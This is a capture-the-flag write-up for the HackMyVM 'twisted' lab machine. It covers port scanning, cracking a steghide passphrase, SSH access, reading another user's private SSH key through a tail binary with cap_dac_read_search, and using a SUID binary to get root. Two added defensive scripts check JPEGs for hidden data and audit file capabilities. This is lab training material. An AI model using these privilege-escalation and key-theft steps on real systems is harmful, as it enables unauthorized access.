I have not played any CTF for a long time, and while scrolling through Discord chats I found another interesting platform, just like Vulnhub, TryHackMe or HTB; its name is HackMyVM. I really appreciate the developer of this website for his work, so I decided to solve a CTF challenge from HackMyVM.


Target IP Address:

As usual, I started with an nmap scan to find open ports and running services on the target machine, using the following command.

nmap -sC -sV -Pn -p- -T4 --max-rate=1000 -o nmap.txt
80/tcp   open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

So I started enumeration with port 80/HTTP, and I found a website with two images which look almost identical to each other, but to a CTF player they are not similar at all :)

└─$ ls -l *.jpg
-rw-r--r-- 1 artof artof 288706 Oct 14 12:21 cat-hidden.jpg
-rw-r--r-- 1 artof artof 288693 Oct 14 12:21 cat-original.jpg

I downloaded both images to my local system using wget, and after that I tried to find hidden files and directories, but failed. The next thought that came to my mind was that there is something I need to do with these two images. I found nothing useful in the metadata, and steghide will only extract data if I have the passphrase.
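A first check an analyst would run on a pair of near-identical images like these is a byte-level comparison of the two copies plus a look for data appended after the JPEG End-Of-Image marker (a decoder ignores anything past that marker, so it is a common hiding spot). The Python script below is an added example, not code from this write-up, and runs against a constructed minimal JPEG embedded in the script (or against two file paths given on the command line). One caveat: steghide embeds data inside the image's DCT coefficients rather than appending it, so the trailing-bytes check will not expose a steghide payload; what the diff does show is the size delta and the offset where the two files start to differ, which is what justifies going after the image with steghide at all.

```python
"""Triage a pair of JPEG files for hidden data: byte-level diff of the two
copies and a check for bytes appended after the End-Of-Image marker.
Added example with constructed sample data; not code from the original write-up."""
import sys

SOI = b"\xff\xd8"   # Start Of Image
EOI = b"\xff\xd9"   # End Of Image


def byte_diff(a: bytes, b: bytes) -> dict:
    """Compare two files byte by byte. Reports the size delta, the offset of the
    first difference and how many bytes differ within the shared prefix."""
    n = min(len(a), len(b))
    changed = [i for i in range(n) if a[i] != b[i]]
    if changed:
        first = changed[0]
    elif len(a) != len(b):
        first = n            # identical prefix, one file is simply longer
    else:
        first = None         # the files are identical
    return {"size_delta": len(b) - len(a), "first_diff": first, "changed_bytes": len(changed)}


def find_eoi_offset(data: bytes) -> int:
    """Walk the JPEG marker segments and return the offset just past the EOI
    marker, i.e. where the image proper ends. Raises ValueError on malformed input."""
    if not data.startswith(SOI):
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xD9:                              # EOI
            return pos + 2
        if marker == 0xFF:                              # fill byte before a marker
            pos += 1
            continue
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:    # TEM / RSTn: no length field
            pos += 2
            continue
        if pos + 3 >= len(data):
            raise ValueError("truncated segment header")
        length = int.from_bytes(data[pos + 2:pos + 4], "big")  # length includes itself
        pos += 2 + length
        if marker == 0xDA:                              # SOS: entropy-coded data follows
            # Skip until the next real marker; FF 00 is a stuffed byte and
            # FF D0..D7 are restart markers, both belong to the scan data.
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not (0xD0 <= nxt <= 0xD7):
                    break
                pos += 1
    raise ValueError("no EOI marker found")


def trailing_after_eoi(data: bytes) -> bytes:
    """Bytes after the image proper. A viewer never reads them, so anything here
    is a candidate appended payload."""
    return data[find_eoi_offset(data):]


# Constructed minimal JPEG (37 bytes): SOI, APP0/JFIF header, one SOS header,
# five bytes of entropy-coded data including a stuffed FF 00, then EOI.
SAMPLE_ORIGINAL = (
    b"\xff\xd8"
    + b"\xff\xe0" + (16).to_bytes(2, "big") + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xff\xda" + (8).to_bytes(2, "big") + b"\x01\x01\x00\x00\x3f\x00"
    + b"\x12\x34\xff\x00\x56"
    + b"\xff\xd9"
)
# Same image with a constructed payload appended after EOI.
SAMPLE_WITH_PAYLOAD = SAMPLE_ORIGINAL + b"CONSTRUCTED-PAYLOAD\n"

if __name__ == "__main__":
    if len(sys.argv) == 3:
        with open(sys.argv[1], "rb") as fa, open(sys.argv[2], "rb") as fb:
            a, b = fa.read(), fb.read()
    else:
        a, b = SAMPLE_ORIGINAL, SAMPLE_WITH_PAYLOAD
    print("diff:", byte_diff(a, b))
    for name, blob in (("first", a), ("second", b)):
        tail = trailing_after_eoi(blob)
        print(f"{name}: {len(tail)} byte(s) after EOI", tail[:32])
```

Run it as `python3 jpegtriage.py cat-original.jpg cat-hidden.jpg` to compare two real files; with no arguments it runs on the embedded sample. A non-zero `changed_bytes` count with no trailing data is the pattern an in-image embedding (steghide, LSB tools) leaves behind.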

While reading about steghide I found a very nice tool, StegCracker (you can find it online along with the installation steps). Using this tool I was able to crack the passphrase and finally got some useful data out of cat-hidden.jpg.

└─$ stegcracker cat-hidden.jpg  
StegCracker 2.0.9 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2020 - Luke Paris (Paradoxis)

No wordlist was specified, using default rockyou.txt wordlist.
Counting lines in wordlist..
Attacking file 'cat-hidden.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: ********
Tried 964 passwords
Your file has been written to: cat-hidden.jpg.out

Next, I used the cat command to read the contents of the file cat-hidden.jpg.out.

└─$ cat cat-hidden.jpg.out

Umm, a password, but for which user? Now that we have the passphrase for the hidden data inside cat-hidden.jpg, it's the right time to use the steghide tool itself, so that we can get the actual file which contains the password.

└─$ steghide extract -sf cat-hidden.jpg
Enter passphrase: 
wrote extracted data to "ma***.txt".

This means the password I got in the steps above belongs to the user ma***, and using SSH I can log in to the system.

└─$ ssh ma***@ -p 2222
ma***@'s password: 
ma***@twisted:~$ ls

After reading the note.txt file I found a .wav file in /var/www/html/. It was Morse code, so using an online website I was able to retrieve the actual text, but that seemed to be of no use. Next I thought of running linpeas.

Files with capabilities:
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+ep

This is what I found. While traversing the home directories I found a user bonita, and inside bonita's home directory there is a .ssh directory, which means that with the tail command I can read the id_rsa file in /home/bonita/.ssh/.
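The capability finding above is worth checking on any host, not just a CTF box: cap_dac_read_search on a general-purpose binary such as tail lets every local user read every file on the system, private keys included. The Python script below is an added example (not linpeas code) that parses `getcap -r / 2>/dev/null` output in both the older `path = caps+flags` form shown above and the newer `path caps=flags` form, and flags the capabilities that bypass access control or allow a privilege change. The first two sample lines are the ones from this write-up; the other two are constructed. The suggested fix, `setcap -r <path>`, clears the file's capability set.

```python
"""Audit file capabilities from `getcap -r / 2>/dev/null` output and flag the
ones that defeat access control or allow privilege change.
Added example with constructed sample lines; not linpeas code."""
import re
import sys

# Capabilities that let a process bypass DAC or become another user. Any of
# these on a general-purpose binary (tail, vim, python, ...) is a finding.
HIGH_RISK = {
    "cap_dac_read_search": "read any file and traverse any directory (private keys, /etc/shadow)",
    "cap_dac_override": "bypass read, write and execute permission checks",
    "cap_setuid": "change UID, including to root",
    "cap_setgid": "change GID, including to privileged groups",
    "cap_sys_admin": "catch-all administrative capability (mounts, namespaces, ...)",
    "cap_sys_ptrace": "attach to and inject into other users' processes",
    "cap_sys_module": "load kernel modules",
    "cap_chown": "change the owner of any file",
    "cap_fowner": "bypass file-ownership checks",
}

# 'cap_a,cap_b+ep' (older libcap) or 'cap_a,cap_b=ep' (newer libcap)
_CAPS_RE = re.compile(r"^([a-z0-9_,]+)[=+-]?([eip]*)$")


def parse_getcap_line(line):
    """Parse one getcap line in either output form.
    Returns (path, [capability names], flags) or None for blank/unparseable lines."""
    line = line.strip()
    if not line:
        return None
    if " = " in line:
        path, caps = line.split(" = ", 1)
    else:
        path, _, caps = line.rpartition(" ")
    m = _CAPS_RE.match(caps.strip())
    if not path or m is None:
        return None
    names = [c for c in m.group(1).split(",") if c]
    return path, names, m.group(2)


def audit_capabilities(getcap_output):
    """Return one finding per (path, high-risk capability) pair. 'effective' is
    True when the 'e' flag is set, i.e. the capability is active even for
    programs that know nothing about capabilities, like tail."""
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, names, flags = parsed
        for cap in names:
            if cap in HIGH_RISK:
                findings.append({
                    "path": path,
                    "capability": cap,
                    "effective": "e" in flags,
                    "reason": HIGH_RISK[cap],
                    "fix": f"setcap -r {path}",
                })
    return findings


# Constructed sample: the first two lines are the ones linpeas reported in this
# write-up (cap_net_raw on ping is the normal distro setup and is not flagged);
# the last two are made up to exercise the newer getcap output format.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+ep
/usr/sbin/arping cap_net_raw=ep
/opt/tools/backup cap_dac_override,cap_chown=eip
"""

if __name__ == "__main__":
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_GETCAP
    for f in audit_capabilities(text):
        state = "effective" if f["effective"] else "permitted only"
        print(f"{f['path']}: {f['capability']} ({state}) - {f['reason']}; fix: {f['fix']}")
```

On a live host, feed it the real output: `getcap -r / 2>/dev/null | python3 capaudit.py`. A capability that is only permitted (`+p`) is still reachable by a capability-aware program, which is why the script reports it too rather than silently skipping it.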

ma***@twisted:/home$ /usr/bin/tail -n 100 bonita/.ssh/id_rsa

That's good. Now, using the private key, I can log in to the system as user bonita.

└─$ ssh -i id_rsa bonita@ -p 2222
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
bonita@twisted:~$ ls
beroot  user.txt
bonita@twisted:~$ cat user.txt 

Root Shell

So we got our first flag. Now for root: I found that the binary beroot is SUID, and after executing it, it asked for a code.

bonita@twisted:~$ ./beroot 
Enter the code:


Now I transferred this binary to my local system and, using Ghidra, I recovered the actual logic of the program and also the right code.

That's simple: now I just need to enter the right code and I will get a root shell.

bonita@twisted:~$ ./beroot 
Enter the code:
root@twisted:~# cd /root
root@twisted:/root# cat root.txt

So this completes the challenge. Once again, thanks to the developer of HackMyVM and this machine :)

NOTE: The awesome artwork used in this article was created by Chelsea Carlson.